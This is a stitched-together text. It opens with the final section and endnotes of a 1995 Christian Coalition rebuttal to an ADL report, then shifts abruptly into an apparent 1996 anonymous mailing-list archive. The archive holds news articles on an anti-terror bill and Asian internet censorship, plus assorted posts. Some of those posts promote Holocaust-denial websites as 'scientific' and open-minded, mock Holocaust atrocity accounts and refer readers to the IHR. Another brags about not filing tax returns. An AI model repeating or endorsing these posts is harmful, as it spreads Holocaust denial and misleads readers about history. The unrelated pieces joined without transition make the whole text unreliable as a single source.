The Coalition's 1994 Congressional Scorecard, which lists Senators' and Representatives' votes on a wide range of issues affecting families, makes no distinctions based upon party affiliation. Representative Charles Stenholm, (D-TX) scored a 100-percent rating on the Christian Coalition Scorecard. Representative Pete Geren, (D-TX) scored a 93- percent rating, as did Representative Gene Taylor, (D-MS). Some of the Democrats who have spoken at Christian Coalition events in recent years include: state Representative Roger Byrd (D-GA), Duval County (FL) School Board member Stan Jordan, Beverly Clark, Charles Winburn, and State Representative Woody Jenkins (D-LA). (57)
A number of other Democrats received high ratings on the Congressional Scorecard. Sen. Richard Shelby (D-AL), for instance, agreed with Coalition positions on 71 percent of the surveyed votes. Representative Jimmy Hayes (D-LA) scored 86 percent. Representative Sonny Montgomery (D-MS) rated 71 percent, as did Representative William Lipinski (D-IL). Representative Matthew McHugh (D-NY) had a 93-percent rating.
The Christian Coalition Scorecard highlighted Senate votes on such issues as: tax incentives for families; balanced budget amendment; taxpayer-funded abortions; Joycelyn Elders' nomination for surgeon general; term limits for Congress; and condoms for school children without parental consent. House votes included: cutting government waste; parental notification for abortion; abstinence-based sex education; lifting the ban on fetal tissue research; criminalizing pro-life speech. Each vote is factually described. (58)
The 1994 Congressional Scorecard clearly states that the listing of these votes on issues affecting the family does not imply an endorsement for office or a commentary on the personal faith of the elected official. "This Scorecard is for informational purposes and is not intended to influence the outcome of any election," the Scorecard reads. "Christian Coalition does not advocate the election or defeat of any candidate, and does not endorse any political party. Scores in this Scorecard are not to be taken as a commentary on the personal faith of individual members of Congress. The information in this Scorecard is provided as a tool to help you more effectively lobby your Congressman and two Senators on issues before the 103rd Congress." (59)
The Coalition's Scorecard and voter guides are little different from the informational ratings issued by the AFL-CIO, Americans for Democratic Action, American Conservative Union and numerous other organizations. The Coalition simply provides to voters - of all political persuasions - what they richly deserve: reference tools that show how their elected representatives in government stand on issues of concern to families.
How the Christian Coalition Works
The ADL complains that Coalition members play a major role in some state and local party organizations because they are the most energetic participants. What is wrong with citizens taking part in the political process? The ADL takes issue with religious conservatives who are simply exercising their rights of citizenship.
The Christian Coalition's Leadership Manual provides members with nuts-and-bolts information on the electoral process, from how to organize a local chapter and requirements for Christian Coalition affiliation to how to conduct a voter canvass.
The Coalition's purposes, as outlined in the manual, are as follows:
To represent Christians before local councils, state legislatures and the U.S. Congress.
To train Christians for effective political action.
To inform Christians of timely issues and legislation.
To speak out in the public arena and the media.
To protest anti-Christian bigotry. (60)
"Your job as a Christian Coalition leader is to identify the Christian vote and get it to the polls," the manual says. (61)  In this sense, the Coalition's mission is no different from the League of Women Voters, the National Organization for Women, NARAL, the AFL-CIO, or Jesse Jackson's Rainbow Coalition, which has registered hundreds of thousands of African-Americans to vote.
The Coalition's policy stances are rooted in faith - as were America's founders, who spoke of the people of this nation as being endowed by their "Creator" with "certain inalienable rights." As Reed said on NBC's Meet the Press:  "The apostle Paul told the early Christians to render unto Caesar the things that are Caesar's and to exercise their civic responsibility. And what we're saying is that in a democracy, when you render unto the government that which is due it, that means your vote, your informed participation and your involvement." (62)
Personalizing Public Policy Differences
The ADL apparently regards grassroots democracy as a threat to, in its words, "tolerance and pluralism." In fact, the Coalition and the ADL simply disagree on public policy issues. The Coalition does not support taxpayer-funded abortion as a form of birth control. Neither do 87 percent of the American people, according to a recent survey. But the ADL equates a pro-family, pro-life position with intolerance. Indeed, Abe Foxman, executive director of the ADL, even charges that supporting the sanctity of innocent human life creates "hostility" in which "tolerance and pluralism inevitably plummet." (63)  To equate one's public policy views with "tolerance" and impugn one's political foes as opposed to "pluralism" is intellectually dishonest. The Christian Coalition believes students should be allowed to exercise their First Amendment right to free speech, including speech of a religious content. The ADL says this somehow violates the separation of church and state. If so, it may have a dispute with President Clinton as well. In a town hall meeting in Charlotte, North Carolina, in April 1994, Clinton stated his view that voluntary prayer does not violate the Constitution:  "Now, it's been carried to such an extent now where they say, some people have said you can't have a prayer at a graduation exercise. I personally didn't agree with that. Why? Because if you're praying at a graduation exercise or a sporting event, it's a big open air thing, and no one's being coerced."
"I do not agree that people should not be able to freely pray and to acknowledge God. We have a chaplain in Congress, in the Senate and the House." (64)
Does the ADL believe that President Clinton is undermining pluralism by his opposition to the Lee v. Weisman decision of 1992 that bans high school graduation prayer? His position is identical to that of the Christian Coalition.
We may believe the ADL is wrong about some policy issues, but unlike the ADL we do not question their right to hold such views or their commitment to pluralism. And we stand arm-and-arm with the ADL in giving no quarter to anti-Semitism or bigotry of any kind.
Partisan Attacks
Unfortunately, the ADL report has become part of a highly partisan campaign against religious folk launched by the national Democratic party. By lending its name to this campaign against people of faith, the ADL risks being viewed as an organization driven more by partisan politics than Jewish concerns.
In August 1993, the Washington-based National Jewish Democratic Council held a conference to organize a 40-group coalition to oppose Christian conservatives. Among the participants were Arthur Kropp, president of People for the American Way, and Clinton Cabinet members Federico Pena and Donna Shalala. (65)
Throughout 1993, Lieutenant Governor Don Beyer of Virginia ran a particularly vicious, bigoted campaign against Mike Farris, the Republican candidate for lieutenant governor. Beyer used materials supplied by People for the American Way which accused Farris of seeking to ban books such as The Wizard of Oz. The Washington Post concluded that the charges were false. Michael Barone of U.S. News and World Report said that the allegation against Farris "unfairly distorts and ridicules" his views. (66)
In June of 1994, just days after the ADL released its report, Representative Vic Fazio (D-CA), chairman of the Democratic Congressional Campaign Committee, launched a new attack on religious conservatives, calling them "fire-breathing fanatics." The Democratic National Committee even has set up a bulletin board on Compuserve called "Radical Right," which contains speeches and other party documents designed to assault Christians.
U.S. Surgeon General Joycelyn Elders gave a speech in New York City within weeks of the ADL report's release in which she referred to religious folk who are conservatives as "un-Christian." This was a clear assault on the deeply-held religious beliefs of millions of Americans. All 44 Republicans in the Senate condemned this act of arch-bigotry in a letter to President Bill Clinton, and 87 members of the House of Representatives called for Elders' resignation. (67)  What was the ADL's reaction to this act of defamation? Thunderous silence.
The ADL, once a respected civil rights organization, has aided and abetted a campaign of intolerance against people of faith with whom they disagree politically. Instead of calling the Democrats to task for dividing Americans based on where they go to church or synagogue, the ADL has cast its own stones. "It's an old thing in politics," said Representative Dick Armey of Texas, "Whenever you are trying to get people's attention, you create a monster out there. So, they are looking for a bogeymen, and they are hyping the story that the Republican Party is being taken over by a bunch of extremists." (68)
"We are in a race between civilization and catastrophe," former Education Secretary Bill Bennett said of the campaign against religious conservatives. "We have record murder and violent crime rates, huge increases in births to unwed mothers, educational decline, broken families, and a president who has established a record of broken promises. All of this, and we are told that the very religious are what we must fear. Religion is on the side of civilization; more people ought to begin to realize it." (69)
The Separation of Church and State
The ADL report is full of accusations that the Christian Coalition does not support the separation of church and state. Its sources include undated flyers passed out at conferences and quotations lifted out of context - as well as more unreliable pseudo-scholarship by Skipp Porteous. It also features attacks on David Barton, a Texas-based scholar who has argued that many of America's founders were sympathetic to Christian values. Most of Barton's work extensively documents writings of the nation's founders.
The truth is that there is a lively debate about the role of religion in public life and the meaning of the First Amendment. The Christian Coalition supports the Establishment clause prohibiting a state- sponsored church. It does not support attempts to use the establishment clause to stifle the free speech rights of Christians, Jews, Muslims, native Americans, or anyone else. That is why the Christian Coalition supported the Religious Freedom Restoration Act of 1993, which overturned the Supreme Court's 1990 decision in Employment Division v. Smith. In this decision the Court discarded the "compelling state interest standard" criteria for judging whether laws violated rights to free exercise of religion. The ADL strongly supported this legislation as well.
In the same spirit, the Christian Coalition supports free speech rights for children in public schools. While we oppose mandatory prayers composed by school officials, we believe voluntary, student-initiated prayer is consistent with First Amendment rights to free speech. While disagreements over First Amendment issues abound, it is disingenuous to suggest that those who would allow religious speech in public schools are ipso facto opposed to church-state separation. The ADL quotes Pat Robertson as arguing that the "separation of church and state" is a "Soviet concept." This quotation is lifted out of context.  Robertson merely noted that the term "separation of church and state" does not appear in the U.S. Constitution, which is a statement of fact. The First Amendment specifically reads: "Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof."
Robertson is a strong supporter of the First Amendment. For example, during his 1988 presidential campaign, Robertson stated: "I believe absolutely in the separation of church and state." (70)
In 1991, he said on Larry King Live, "I think it [the separation of church and state] is far better. You look at Europe where they have established churches and they are really dying out. We have a much healthier church here in America, free from government money- .But I don't think the Constitution requires government to be opposed to religious faith."(71)
Robertson's words echo those of William O. Douglas in Zorach v. Clauson (1952). "We are a religious people whose system of government presupposes a Supreme Being," argued Douglas. There was, he added, "no constitutional requirement which makes it necessary for government to be hostile to religion and to throw its weight against efforts to widen the effective scope of religious influence." (72)
For most of America's history, church pulpits flamed with sermons about social injustices ranging from slavery and racism to poverty and the liquor trade. No one suggested that these activities posed a threat to the separation of church and state. Americans always have resisted the notion of a national religion, but embraced faith-based political movements as an essential counterbalance to social injustice and government encroachments on liberty.
This is the view of the Christian Coalition. As Ralph Reed argues in his forthcoming book: "None of this adds up to the conclusion that America is a 'Christian nation' in the sense of a theocratic state or a unicultural society. That not only ignores the enormous contribution that Jews have made to America, but it is something of an anachronism. It makes just as much sense to say that Massachusetts is a Puritan colony or that Maryland is a Catholic state." (73)
Reed adds, "What religious conservatives want is to accommodate the historic role of faith in American civic life. In short, they seek to restore the time-honored tradition of civil religion - not to establish Christianity by law or to create an official church." (74)
"Our agenda, ultimately, of the Christian Coalition, isn't about theology," Reed said on ABC Nightline recently. "It is about public policy. We are trying to get public policy that is more family-friendly. And we think lower taxes, smaller government, and government that lives within its means is more family friendly." (75)
The supreme tragedy of the ADL report is there is a resurgent anti-Semitism across the land emanating from sources as wide-ranging as the Ku Klux Klan, former Farrakhan lieutenant Kahlid Abdul Muhammad (who called New York city "Jew York City"), David Duke, and some opponents of the Israeli lobby. But an inaccurate, biased, and politically motivated report like the recent ADL offering undermines efforts to combat anti-Semitism. By crying wolf, the ADL endangers its credibility at a time of rising bigotry and a period of extraordinary delicacy in the Middle East peace process.
In response to criticism of its report, the ADL has refused to back off, though it has engaged in some strategic public relations backpedaling. (76)  For its part, the Christian Coalition will continue to combat anti-Semitism and religious bigotry in all its ugly forms. It is willing to seek common ground with Jewish organizations on issues of mutual concern. The Christian Coalition never will waver from its steadfast defense of the Jewish people and the nation of Israel,  though it has been unfairly attacked by the ADL.
"The Jewish community should recognize the depth of religious faith among Christian evangelicals and treat the Religious Right with tolerance and respect," urges Marshall Breger of the Heritage Foundation. (77)
 The ADL has displayed neither tolerance nor respect. Instead, it has engaged in a partisan campaign of innuendo, half-truths and outright falsehoods.
Sadly, the ultimate losers are not the ADL's constituency, but all of us, for we desperately need a legitimate watchdog to combat bigotry. The Anti-Defamation League has committed defamation, not only against religious conservatives, but against its own stated purpose.
We earnestly hope the ADL returns to its time-honored and vital role of ensuring that intolerance has no place in our civic discourse. For our part - despite the unfair and shoddily researched attack by the ADL - we will remain vigilant in seeing that anti-Semitism and bigotry does not rear its monstrous head in our society.
END NOTES
1. 	Mona Charen, "ADL Playing Upon Old Fears?"Washington Times, July 7, 1994, A17.
2.	Boschwitz Op-Ed submitted to the New York Times July 25, 1994.
3. 	Sam Skolnik, "ADL Takes Heat for Criticizing Christian Right,"Washington Jewish Week, June 30, 1994.
4. 	Don Feder, "ADL Attack Discredits Organization," Boston Herald, June 16, 1994.
5. 	Beth Gilinsky, letter to the editor, New York Post, July 13, 1994 (original in possession of author).
6. 	An "annotated" bibliography provides few specific references.  For sources on the Christian Coalition, for example, the ADL provides vague clues such as this: "The Los Angeles Times provided a comprehensive account of San Diego by Barry Horstman (March 22, 1992), and generally offers reliable West Coast coverage; the Norfolk Virginian-Pilot, The Freedom Writer, Group Research Report, People for the American Way's occasional reports and the group's monthly, Right- Wing Watch, were consulted frequently." Thus, the reader is supposed to take it on ADL' s word that its sources are reliable and that the quotations in the ADL report are accurate. Without specific listings of sources it is impossible to check many of its assertions.
7. 	Acknowledgments in the ADL report include, in addition to those already mentioned: Project Toscin, Coalition for Human Dignity, Group Research Report, Citizens Project, Mainstream Voters Project and Women' s Project. ADL, p. i.
8. 	Larry Kanter, "Gaining Journalistic Status Gives ADL a Legal Shot in the Arm," Northern California Jewish Bulletin, v. 142, No. 38, October 15, 1993, p. 3.
9. 	ADL, "Religious Right," p. 42.
10. 	Thomas L. Jipping, "The Anti-Defamation League's Campaign of Defamation," Free Congress Foundation, June 24, 1994, p. 13.
11. 	ADL, "The Religious Right," p. 27. 12. 	Ibid.
13.	Transcript of NBC's Meet the Press, November 29, 1992, p. 4.
14. 	Sean Loughlin, "Christian Coalition's Soldier Marches On," Sarasota Herald-Tribune, February 22, 1994.
15. 	ADL, "Religious Right," p. 42. (The ADL consistently spells Wittmann' s name as "Wittman.")
16. 	ADL, "Religious Right," p. 91.
17. 	Thomas L. Jipping, "The Anti-Defamation League's Campaign of Defamation," June 24, 1994, Free Congress Foundation, p. 14.
18. 	David Cantor, "Anti-Defamation League Response to the Christian Coalition," July 13, 1994.
19. 	ADL, "Religious Right," pp. 2, 21, 22, 24, 42, 43, 97.
20. 	Transcript of speech for Christians' Israel Public Action Campaign, "Pat Robertson: Defender of Israel," January 30, 1994, p. 12.
21. 	Larry B. Stammer, "Religious Broadcasters Vow Fight On Doctrine Issue," Los Angeles Times, February 18, 1993.
22. 	John Wheeler, Jr., "Peace in the Holy Land," Christian American, February 1994, page 1, 4.
23. 	ADL, "Religious Right," p. 43.
24. 	John Wheeler, Jr., "Anti-Semitism in the Church," Christian American, July/August 1991, p. 12.
25. 	Ibid, p. 12.
26.	Rudy Boschwitz Op-Ed submitted to the New York Times July 25, 1994.
27. 	Sam Skolnik, "ADL Takes Heat for Criticizing Christian Right," Washington Jewish Week, June 20, 1994.
28. 	Don Feder, "ADL Attack Discredits Organization," Boston Herald, June 16, 1994.
29. 	Rod Drehrer, "Pro-Israel Group Decried ADL Attack: Christian Conservatives Are Friends," Washington Times, June 28, 1994, A12.
30. 	ADL, "Religious Right," p. 45.
31. 	Memo to Christian Coalition from Rhett Davis, July 5, 1994.
32. 	Ibid.
33. 	Don Feder, "ADL Attack Discredits Organization," Boston Herald, June 16, 1994.
34.	ADL, "Religious Right," p. 2.
35.	Transcript of CBN' s 700 Club, November 13, 1991.
36. 	Dennis King and Chip Berlet, "ADL Gate," Tikkun, July/August
1993, p.36. The article describes how ADL leaders complained to the media about how they had been sidelined in their efforts to refute Duke's campaign because of their 501 (c) (3) status. Yet the ADL criticizes other organizations with the same tax status for not denouncing the Duke campaign.
37. 	ADL, "Religious Right," p. 20.
38. 	Ibid, p. 29.
39. 	Ibid, p. 28.
40. 	Thomas B. Edsall, "Christian Political Soldier Helps Revive Movement," Washington Post, September 10, 1993, A4.
41.	ADL, "Religious Right," p. 20.
42.	Jeff Baran, letter to Christian Coalition national office, July 25, 1994.
43. 	Carol Innerst, "Parents Labeled Religious Fanatics for Fighting Schools: Schools Learn Ways to Pin Labels on Parental Foes," Washington Times, April 13, 1994, A1.
44. 	Transcript of CNN' s Crossfire, December 18, 1992 [Transcript  p. 10.
45. 	KABC Radio, November 15, 1993.
46. 	Ralph E. Reed, working manuscript: The Dynamic Role of Religion in American Life (Dallas, TX: Word, Inc., 1994), p. 34.
47. 	Ralph E. Reed, "Casting a Wider Net," Policy Review, (Summer 1993), p. 31-33.
48. 	See, for example: "Christian Coalition NYC Voter Driver is Multi-Cultural Grassroots Effort," Christian Coalition press release, April 28, 1993. The New York Times carried in-depth stories about the Coalition's involvement in the May 4 elections on April 10, April 16 and April 17. Other New York media provided similarly detailed coverage.
49. 	Sam Dillon, "Spirited Race for Schools Accelerates," New York Times, April 28, 1993, B2.
50. 	ADL, "Religious Right," p. 32.
51. 	Letter from Ralph Reed to Rick Schenker, October 7, 1992.
52.	Christian Coalition Leadership Manual  (1994), p. 19.
53. 	ADL, "Religious Right," p. 36-37; 1990 FEC MURS 3167 and 3176, pp. 23, 24.
54. 	Reed, working manuscript, p. 223.
55. 	Christian Coalition Voter Guide, Texas Democratic Runoff Election, U.S. Congress, District 25.
56. 	Barbara Woerner, "African-American Christian Wins Office," Christian American (April 1994), p. 9.
57. 	Christian Coalition Congressional Scorecard, 1994 Edition.
58. 	Ibid.
59. 	Ibid.
60. 	Christian Coalition Leadership Manual, p. 1.3.
61. 	Ibid, p. 3.23.
62. 	Transcript of NBC's Meet the Press, November 29, 1992, p. 1.
63. 	ADL, "Religious Right," p. iii.
64. 	White House Press Office, "Remarks of President Clinton in 'Evening with the President' in Charlotte, North Carolina," April 28, 1994, U.S. Newswire.
65. 	Deborah Kalb, "Jewish Democrats Target Religious Right," Manhattan Jewish Sentinel, August 11-17, 1993, pp. 1, 11.
66.	Michael Barone, "In Virginia, Distorted Debate," Washington Post, October 28, 1993, p. A23.
67. 	Larry Marasak, "Elders Resignation Urged," Houston Chronicle, June 25, 1994.
68. 	Transcript of ABC's Nightline, June 23, 1994.
69. 	Statement by William J. Bennett, Press Conference on Religious Bigotry in Virginia Politics, October 25, 1993.
70. 	John Margolis, "Robertson Candidacy on Line in South Carolina," Chicago Tribune, March 5, 1988.
71. 	Transcript of CNN's Larry King Live, April 10, 1991.
72. 	Zorach v. Clauson, 343 U.S. 306 (1952).
73. 	Reed, working manuscript: p. 126.
74. 	Ibid.
75. 	Transcript of ABC's Nightline, June 23, 1994.
76. 	In a letter to the editor of the New York Post published on July 13, 1993, Foxman downplays the ADL report as mere "criticism" and says "a healthy democracy encourages and depends on the political involvement of conservative Christians."
77.	Marshall Breger, "Jewish Community Should Recognize Depth of Religious Faith," Moment, April 1994, p. 14.
Text Only Map
Copyright  1995 by The
Christian Coalition of
this page and all contents.  All Rights Reserved.

@_date: 1996-03-14 13:41:39
@_author: Anonymous 
@_subject: House Votes to Weaken Anti Terror Bill 
House Votes to Weaken Anti Terror Bill
Washington, March 13 (Reuter) -- The House of
Representatives Wednesday removed major provisions of an
anti-terrorism bill in a vote that sponsors of the
legislation said would gut the measure.
An amendment, adopted 246-171 by conservative Republicans and some liberal Democrats, removed language that would
give the government authority to label groups as
terrorist so foreign members can be deported more easily.
It also prohibits use of wiretap evidence obtained
without a warrant.
"We do not need to give our government vast new powers,"
Georgia Republican Bob Barr, the amendment's author, said
before the vote. He said current laws were strong enough.
"With the Barr amendment this is not a real
anti-terrorism bill," said Republican Henry Hyde of
Illinois, the bill's main sponsor and chairman of the
House Judiciary Committee.
Hyde said an unusual coalition of groups including the
conservative National Rifle Association and the liberal
American Civil Liberties Union were opposing the bill
because they thought it gave the federal government too
much power.
Hyde said one Republican colleague told him privately,
" 'I trust Hamas (the militant Islamic group) more than
my own government.' "

@_date: 1996-03-17 02:09:59
@_author: Anonymous 
@_subject: Yeo, Pea-brained Imbecile 
The Economist, 16 March 1996, pp. 42-43.
Asia and the Internet: Not too modern, please
Hunched quietly over their terminals around the world, the
mouse-clicking, keyboard-tapping denizens of the Internet have
created quite a noise in Asia. The worldwide computer network
is still young in the region, but already cyberspace resounds
to the crashing of broken taboos, and collisions with the
powers that be.
In discussion groups on the Internet, you will find views
never aired in the domestic media; about Malaysia, a call for
the emigration of ethnic Chinese; about Indonesia, passionate
pleas for East Timorese independence; about Thailand, jibes at
the monarchy, which are a crime. On the World Wide Web, the
fast-growing multimedia part of the network, everyone from
Confucius to the Penthouse pet of the month seems to have a
"home page".
All of this confronts many Asian governments with an old
dilemma in a new form. All want to be "modern". But many
reject the notion that modernity encompasses the sort of
political pluralism seen in the west. On the Internet
modernity and pluralism go hand in hand. Hence the recent
flurry of efforts by governments in the region to exert
control over the Internet and overturn what they see as the
American colonisation of cyberspace.
The effort is complicated by the undoubted commercial
potential ofthe Internet, and its future as a business tool.
Most countries would prefer to do without the smut and the
anti-government invective, but none wants to risk being left
out. Fidel Ramos, president ofthe Philippines,whose press is
freer than others in Asia, has his own home page, but so does
the military junta that runs Myanmar's media like an Orwellian
Ministry of Truth.
The dilemma is most acute for Singapore. More than any other
country in the region, it prides itself on being ahead of the
technological game. Indeed, its economic success relies on a
state-of-the-art infrastructure. By the end of the century the
government hopes to have created an "intelligent island", with
at least 95% of homes cabled for services like the Internet
and interactive television.
Already, the government has a big presence on the World Wide
WebHt even provides links to a Board for Online Graffiti ("the
only place in Singapore where graffiti are legal"). You can
make your choice of virtual lavatory wall on which to scribble
a message. More seriously, the World Chinese Business Network
hopes to harness the Internet to the legendary "guanxi" or
connections that drive overseas Chinese business. George Yeo,
Singapore's information minister, is fluent in cyberbabble.
"we will need a URL [universal resource locator] that is easy
to remember," he told a meeting of his colleagues from the
Association of South-East Asian Nations (ASEAN) on March 7th.
"we should also encourage hyperlinks to each other's web
But Singapore is also among the staunchest critics of
unfettered individualism, and of western attempts to foist its
political standards on Asia. Because its content remains
dominated by westerners, the Internet can be seen as part of
such an attempt. Every fanatic liberal and foulmouthed crank
can air his heresies and obscenities. So Mr Yeo also warned
his ASEAN colleagues that "the influx of objectionable
materials via the new electronic media, if left unchecked,
will undermine our values and traditions."
He was speaking the day after Singapore had introduced
"anti-pollution measures" to clean up the I nternet in
Singapore. The three local "providers", offering access to the
I nternet by a domestic telephone call, will be required to
filter out offensive material. "Cybercafes" providing
computers for customers to use the Internet will have to
install filter software such as "Net Nanny" or "Surf Watch".
But this is not just an antipornography drive like that seen
in many countries. Organisations posting political or
religious information on to the World Wide Web will need to
register with the broadcasting authority.
Technically, Singapore's effort to control the Internet will
be complicated. Mr Yeo suggested it was feasible because all
international telephone traffic reaches Singapore through one
network, operated by Singapore Telecom. So the authorities are
able to monitor anything being sent to Internet servers (who
distribute material) in Singapore. Singaporeans could still
dial abroad and get access to the uncensored Net. But that
would be expensive -- prohibitively so for most people,
especially if they wanted to download a pin-up, which can be
frustratingly time-consuming.
Mr Yeo stressed that Singapore did not intend to "stifle
discussion". The only obligation on those engaging in
political debate was to take a "certain responsibility and
accountability" for their views. It was not clear how these
requirements would apply to the Singaporean who responded to
the speech by calling the minister a "pea-brained imbecile" on
an Internet discussion group.
Singapore's house-cleaning effort will be watched closely by
other governments in the region. Of Singapore's 3m people,
100,000 already have Internet accounts, twice as many as in
China (population 1.2 billion). Nevertheless, China has
already gone a step further than Singapore, requiring all
Internet users as well as providers to register. It too is
looking at how to put a cordon sanitaire around the Internet.
Like Myanmar and Vietnam, it is particularly concerned about
the campaigning activities in cyberspace of exiled dissidents.
Vietnam is seeking prevention rather than cure. The
state-owned Internet provider, Netnam, does not as yet give
subscribers access to the World Wide Web, just to e-mail
Other ASEAN countries have so far preferred to be seen as
Internet-friendly. Malaysia's deputy prime minister, Anwar
Ibrahim, recently opened an exhibition about the Internet in
Kuala Lumpur with a warning against censorship. "Let us not
forget", he said, "that an informed citizenry is also a
responsible citizenry."
Similarly in Indonesia and Thailand, the Internet is largely
unregulated. An Indonesian magazine, Tempo, banned in 1994 for
upsetting the government, has just reappeared "on-line", which
even the censors admit is perfectly legal. In the much freer
intellectual climate of Thailand, the concern has been as much
about sex as about politics. An Internet campaign has urged a
boycott of Thai goods because of the prevalence of child
prostitution in the country. And a photograph has been posted
on the Internet purportedly showing a senior politician
engaged in sexual congress with another man's wife.
As the Internet gathers pace, so too will its impact on the
political scene. InJanuary an article in Singapore's
obsequiously pro-government Straits Times asked whether
Singapore would "change the Internet", or the other way round.
"A little of both," it concluded. But as the Internet
free-for-all becomes more readily available to the population
at large, other, more decorous, media may find it hard to
ignore the challenge. The Straits Times itself may be among
the first to feel the change.

@_date: 1996-03-18 20:26:05
@_author: Anonymous 
@_subject: Judge blocks French ISPs from connecting to revisionist sites 
So that y'all can see what the fuss is about, try the following sites :
Theres a wealth of eye opening information there, not only about the
holocaust, but about freedom of speech, censorship, civil librerties,
hate groups, nazi hunters etc. etc.  The sites are noticeably empty
of "hate speech," and are in no way "denying the holocaust," but are
simply adopting a scientific approach to documenting the events of the
holocaust, seperating fact from fiction.
I was surprised - the authors of these sites come across as very sane
and open-minded, not the foaming at the mouth bigoted types that others
lead us to believe.
Anyone who seriously calls him(her)self open-minded should give these
sites a go - they certainly got me thinking.
The recent actions of the French and German governments make me feel
like I'm living in the middle ages.  I am truly disgusted at the
actions of such close minded people who have obviously not looked
at the sites involved.
Anon. (due to the emotional nature of this subject.)

@_date: 1996-03-21 01:38:13
@_author: Anonymous 
@_subject: No Subject 
This came from Dave^H^H^H^HAnonymous in the context of that highly entertaining rec.music.white-power hullabaloo. What he was thinking cross-posting to alt.politics.white-power, I can't imagine.
The References: and Reply-To: headers are hilarious.
- -L. Detweiler
 alias Rich Graves
 FUCKING STATIST
 Newsgroups: news.groups,alt.politics.white-power,alt.2600
Sender: replay at utopia.hacktic.nl
Reply-To:  L. Detweiler
NNTP-Posting-Host: utopia.hacktic.nl

@_date: 1996-03-21 22:03:24
@_author: Anonymous 
@_subject: A MODEST PROPOSAL 
: Having said that, I am totally put off by the gradiose and
: devisive ravings of this commentator.  During the Second World
: War the Nazis required Jews in the occupied countries to wear a
: yellow star of David to identify themselves.  In Denmark, the
: king so identified himself, and soon so did most of his subjects.
Ohh pleeez!!, give YOUR ravings a rest
Next you'll be raving about soap and lampshades made out of Jews.
The story about the Danish King and the Yellow star is a famous wartime
lie by the US.  When Germany invaded Denmark and Norway, the king of
Norway fled to London to continue resistance.  The king of Denmark
surrendered.  Many in the US thought the Danish king was a coward.
During the war the story  about the yellow star was made up to make the
king look better.
For more details try out IHRs web site on A recent article from a British on-line newspaper:-
The Electronic Telegraph Tuesday 29 August 1995
Denmark's resistance to Nazis 'is a myth'
By John Keegan, Defence Editor
DANISH resistance to German occupation during the Second World War is largely
a myth, according to a leading historian.
The civilian population was not involved in resistance and the celebrated
rescue of Denmark's Jews from Nazi deportation was facilitated by the German
occupiers themselves. Those caught assisting the Jews' escape were either not
punished or else given nominal prison sentences.
These astonishing claims were made by Prof Henning Poulsen, of Aarhus
University, at a conference on "The Second World War as Myth and History"
held in the Swedish Houses of Parliament. The conference was opened by the
Swedish foreign minister, Lena Hjelm-Wallen, and closed by the speaker of
the Swedish parliament, Birgitta Dahl.
Prof Poulsen insisted that his views were not controversial, a view supported
by another Danish professor. The official story of the resistance was, he
said, no longer accepted by most young Danes, who found it exaggerated and
boring. He reminded his audience of fellow historians from Norway, Sweden,
Finland, Iceland, Russia, Canada and Germany that Denmark capitulated on the
day of the German invasion, May 9, 1940, and was not treated by Germany as a
conquered nation.
The elected government remained in office and German officials belonging to the
administration in Copenhagen made visits to Danish ministers, not vice versa.
Danish political parties were allowed to function normally and to maintain
democratic debate. The only limitation on their activities was that criticism
of Germany was not permitted.
The occupation remained a benign one.
Werner Best, the SS officer representing the German foreign office, did not
wear his black uniform and was not allowed by Himmler to use his high SS rank
title. The foreign office was the agency chosen by Hitler to represent German
power in Denmark during the occupation.
After August 1943, when there were riots in Copenhagen following misbehaviour
by German troops, conditions worsened, said Prof Poulsen.
The Germans dissolved the elected government and imposed direct administration.
Nevertheless, he said, the occupation remained a benign one.
Danish civilian rations were more generous than those in Germany and when
German police were called on to put down demonstrations in Danish cities they
did so under the regulations governing police response to civil disorder in
In his most sensational revelation, he said that the only concentration camp
set up by the Germans on Danish soil, at Froesley, never held more than 4,000
inmates, 2,000 fewer than it was designed to contain.
Denmark "won a war in which it had not taken part"
It was administered by the Danish prison service and was the only concentration
camp in the Nazi system where the German guards asked for the same food as the
prisoners. It was ironic, Prof Poulsen said, that Denmark was included among
the victor nations in 1945 by Britain, America and the Soviet Union. It had
thus "won a war in which it had not taken part".
Prof Poulsen conceded that there had been resistance in Denmark, but of a
military, not civilian, character.
By that he appeared to mean that sabotage operations against the Germans were
the acts of unrepresentative groups, working in co-operation with the British
Special Operations Executive, and did not represent the attitude of the
majority of the population.
Prof Poulsen's paper is likely to provoke argument, particularly in Britain,
America and Israel, where the Danish success in arranging the escape of 95 per
cent of the country's 7,000 Jews to neutral Sweden in September, 1943, is
hailed as an example of what might have been achieved elsewhere had domestic
populations shown the same determination.
He suggested that the escape succeeded because the Germans did not try to
prevent it and because the worst penalty visited on those fishermen who were
caught after smuggling Jews abroad was three months' imprisonment.

@_date: 1996-03-23 15:21:54
@_author: Anonymous 
@_subject: No Subject 
So what? I've gone years without filing a damned tax return because I don't owe anything. And the couple of times I realized they owed me something I filed tax returns a year or two late.
They don't give a shit unless they think you owe them money
(or technically, if you actually do even if they don't know it).
CP-Lite warning: no crypto.
CDA Warning: Fuck you too.
gjeffers at ns.htc.net (Gary Lee Jeffers) scritten:
 ...
 ...

@_date: 1996-03-23 17:07:14
@_author: Anonymous 
@_subject: detweiling 
I've been studying "detweiling" in old archives
as this issue is raised here every so often.
imho the lesson of detweiler has nothing to do with
detweiler, but in fact more to do with his
targets. effective "detweiling" would be impossible if it
were not for the large egos of his quarry. he
selects his targets carefully based on the size
of their egos, presses their obvious
buttons, and stands back to watch
the fireworks ensue. the larger the ego, the
more easy it is to do this. (i.e. larger
fireworks/provocation ratio).
detweiler took a lot of pride in how much reaction
he could get with just a few posts or barbs. he is not
really apparently responsible for ever actually
mailbombing the cpunk list from what I can tell.
he believed he was perfecting the art of playing
with people's egos. a sort of depraved cyberspatial
psychology experiment.
the amusing thing about "detweiling" is the way
that it is something like a bad, self-perpetuating
virus among those with big egos. detweiler took
great glee in starting the virus wherein these people with big egos blame all their obvious personal problems on him (i.e. atrocious lack of interpersonal skills). since the virus propagates
not because of any action on his part, but because
of the inherent psychology of those with big egos, it continues on this list even though there seems to be no evidence that Detweiler
has had anything to do with this list for
perhaps over a year.
the cypherpunks is a rabid breeding ground for
this detweiler virus, because of the vast array
of throbbing egos. the flamewars are routine
because of the immature psychology of many posters,
esp. the more "prominent" ones. even anonymous
or pseudonymous posters defend themselves because
of their large egos, and those with big egos feel
they have to defend themselves against anonymous
or pseudonymous accusations, or take intermittent
jabs at whatever hapless pseudonym-of-the-week is thought to be detweiler.
imho from what I have seen (which is admittedly
not everything, as the detweiler stuff is rather
endless), detweiler is not really destructive in himself.
but he is an amazing catalyst to those that already
have destructive tendencies within themselves,
and he tweaks them into erupting. in a sense it
